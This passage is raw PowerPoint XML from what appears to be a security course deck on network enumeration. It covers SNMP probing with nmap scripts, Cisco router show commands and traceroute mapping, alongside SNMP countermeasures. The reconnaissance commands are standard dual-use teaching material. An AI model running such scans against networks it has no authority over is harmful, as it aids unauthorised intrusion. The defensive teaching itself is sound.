          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Script snmp-info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Extracts basic information from an SNMPv3 GET request. The same probe is used here as in the service version detection scan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Script Arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.retries, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.timeout, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.version, creds.[service], creds.global</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Basic Format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> -sV &lt;target&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> -sV -p 161 --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>snmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>* 192.168.1.7 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{27C1246C-5AB5-4767-A878-3BA5EA871F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8C2B25-65F4-4EFE-8F3A-9406B3F3EFDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{C71B3A1B-C57F-4E3A-A7DC-823877715C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7DB4AE-8546-4010-8CA2-6B2F575C3FBA}"/>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8789D984-D49E-4F78-A3DE-40EB545191B5}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{70C23061-7B03-4E31-957B-0A316474C09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31D342-62B3-4BEE-98D6-CC3CFEC6379A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{D5C963AD-5C76-434F-A8EC-CCB3822C0A5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BDE290-62A4-49AF-86D7-364CCED7F466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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 &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{2A035F5A-790A-4031-AA19-4ABACBD85A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CE4C8C7-A1F9-4A48-907F-DA9A170FF80D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
            <a:round/>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1. SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{C1EC33AD-26A3-48B4-A02E-134B3E15BB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2D11CE-7E0E-4D5F-8BF6-6E4712302A69}"/>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7EF5E716-1C32-4309-82DA-3345E7F2905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EAE2DE7B-6D16-4366-9E89-4CD7D8F987D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C7152C7-FA56-4EDE-B67E-5413368FE503}"/>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SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{E7BCCB79-FAD5-4929-99E3-466941E4EDD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D4CCC32-B431-49FC-808A-0D45DBDB7BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Remove the SNMP agent or turn off the SNMP service. If shutting off SNMP is not an option, then change the default community string names.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Upgrade to an SNMP version, that encrypts passwords and messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Implement the Group Policy security option called “Additional restrictions anonymous connections”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Ensure that the access to null session pipes, null session shares, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>IPSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> filtering is restricted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Block access to TCP/UDP ports 161.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>In Windows, do not install the management and monitoring component unless it is required (use more effective methods i.e a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SIEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Encrypt or authenticate using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>IPSEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{609F5504-F3E4-4FD1-8D7D-8E493A7B40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85C971-B28D-4430-9CF0-33AB87C6AA22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{12CEFB6A-1B9E-418C-BF62-95FFA8F05DD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5ED1F06-D838-4103-9948-E15436E8847C}"/>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6FFB2012-E13A-49D4-AA69-95FE3475D746}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{345F8265-EB47-40F6-AC83-D6266A28498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A2805A-0448-426D-9BF6-D66D562D8411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{AD33E0B7-C125-44EB-8DFB-12EEBFE8D7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8C280E5-F10E-4847-82FC-2C6346B22D9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7528760"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 &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{1140DFCE-CBB9-4907-8F0D-1EE1159A12D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5F9A69C-5673-4FB1-9F66-C0029F7BA051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7934068" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
            <a:round/>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1. SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{3351AE8D-C3B4-4556-8FE0-50662537AC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F2CF14-18A1-4289-9AA2-B7CEABD899B5}"/>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9EB86838-2B5E-4BDA-B929-819334C6930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9D853E52-A375-42C1-A300-B643490FB8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F3D91E2-6FE8-4514-9543-BD31E0A2BC3F}"/>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Router Console Access Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{E86613CC-B875-45E4-8064-453F4C1F09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48D63C3-CFD4-4FE1-9CF9-A10A651E5C71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Access via Telnet/SSH to the router’s CLI may allow an attacker to enumerate IOS/firmware version, hostname, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> cache, routing table, configured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>VLANs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, and interface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> with common show commands (e.g., show running-config, show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> route, show interfaces).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Examples for Cisco IOS via SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>show running-config           # Dumps current configuration (requires privilege)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>show version                  # Reveals IOS version, uptime, hardware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>show interfaces               # Lists all interfaces with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, MAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> route                 # Shows routing table entries</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>show vlan                     # Lists VLAN configuration</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>show users                    # Active CLI sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{ABFE99A5-B4B3-4867-8860-BD69C5A4741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564D7D-BA04-4529-8B2E-A5346986D94E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{2681294D-EDDC-48F3-B29B-09E355876F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162DFBE-E32B-458A-9AD0-8E11A99C40E7}"/>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B166E33B-BD2D-4CE3-9573-821DFDDCA592}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{F4E64DC1-CC53-47CF-B285-9FA5A271900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B27E58-A1DD-4EAA-874F-1C70EA175435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{F1265EC6-D2E3-4C46-B4F7-D02B83111B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94BE9A-1BDB-4D51-BFDA-3AE944CC9DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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2. routing devices Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 4">
            <a:extLst>
              <a:ext uri="{B16951E5-BAD1-4164-AE7D-62F3F94F71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2E39378-C19B-40EB-A349-186965390615}"/>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3267AED6-28EE-4173-B6DB-C5B5AAEA500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649FCB79-1FBC-49A8-9869-C0A2853E3A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ED3AD2-9B6E-4537-ABCA-C701C3A59656}"/>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Network Mapping and Traceroute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{E8FA5451-1D8A-4A29-8114-ABE38CF856D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C87C205-6183-45D0-996A-0EB41FA82D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Traceroute/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>tracert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> is fundamental for mapping network infrastructure. By incrementing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>TTLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, attackers map hops, identify filtering routers, and can guess interior IP ranges or access-control mechanisms based on hop behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Basic Format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>traceroute &lt;ip_address/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>cidr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>traceroute google.com                # IPv4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
